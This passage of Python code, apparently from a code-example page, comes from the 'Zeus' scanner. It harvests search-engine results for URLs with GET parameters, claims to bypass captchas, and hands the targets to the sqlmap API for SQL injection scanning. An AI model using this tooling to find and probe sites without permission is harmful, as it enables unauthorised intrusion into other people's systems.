    logger.info(set_color("attempting to gather query URL..."))
    try:
        query_url = get_urls(query,
                             url,
                             verbose=verbose,
                             user_agent=user_agent,
                             proxy=proxy_string)
    except Exception as e:
        if "WebDriverException" in str(e):
            logger.exception(
                set_color(
                    "it seems that you exited the browser, please allow the browser "
                    "to complete it's run so that Zeus can bypass captchas and API "
                    "calls",
                    level=50))
        else:
            logger.exception(
                set_color(
                    "{} failed to gather the URL from search engine, caught exception '{}' "
                    "exception has been logged to current log file...".format(
                        os.path.basename(__file__),
                        str(e).strip()),
                    level=50))
        shutdown()
    logger.info(
        set_color(
            "URL successfully gathered, searching for GET parameters..."))
    logger.info(set_color(proxy_string_info))
    # the headers must go with the request itself; updating them on the
    # response object afterwards has no effect
    req = requests.get(query_url, proxies=proxy_string, headers=headers)
    logger.info(set_color(user_agent_info))
    found_urls = URL_REGEX.findall(req.text)
    retval = set()
    for urls in list(found_urls):
        for url in list(urls):
            url = urllib.unquote(url)
            if URL_QUERY_REGEX.match(url) and not any(ex in url for ex in exclude):
                if type(url) is unicode:
                    url = str(url).encode("utf-8")
                if verbose:
                    logger.debug(
                        set_color("found '{}'...".format(url), level=10))
                retval.add(url.split("&amp;")[0])
    logger.info(
        set_color("found a total of {} URL's with a GET parameter...".format(
            len(retval))))
    if len(retval) != 0:
        logger.info(
            set_color(
                "saving found URL's under '{}'...".format(full_file_path)))
        with open(full_file_path, "a+") as log:
            for url in list(retval):
                log.write(url + "\n")
    else:
        logger.critical(
            set_color(
                "did not find any usable URL's with the given query '{}' "
                "using search engine '{}'...".format(query, url),
                level=50))
        shutdown()
    return list(retval) if len(retval) != 0 else None
Example #30
    # run the setup on the program
    setup(verbose=opt.runInVerbose)

    if not opt.hideBanner:
        print(BANNER)

    start_up()

    if opt.runSqliScan:
        prompt(
            "make sure you have started the sqlmap API, press enter when ready to continue..."
        )

    if opt.showSqlmapArguments:
        logger.info(set_color(
            "there are a total of {} arguments understood by sqlmap API, "
            "they include:".format(len(SQLMAP_API_OPTIONS))
        ))
        print("\n")
        for arg in SQLMAP_API_OPTIONS:
            print(
                "[*] {}".format(arg)
            )
        print("\n")
        logger.info(set_color(
            "for more information about sqlmap arguments, see here '{}'...".format(
                SQLMAP_MAN_PAGE_URL
            )
        ))
        shutdown()

    if opt.showNmapArgs: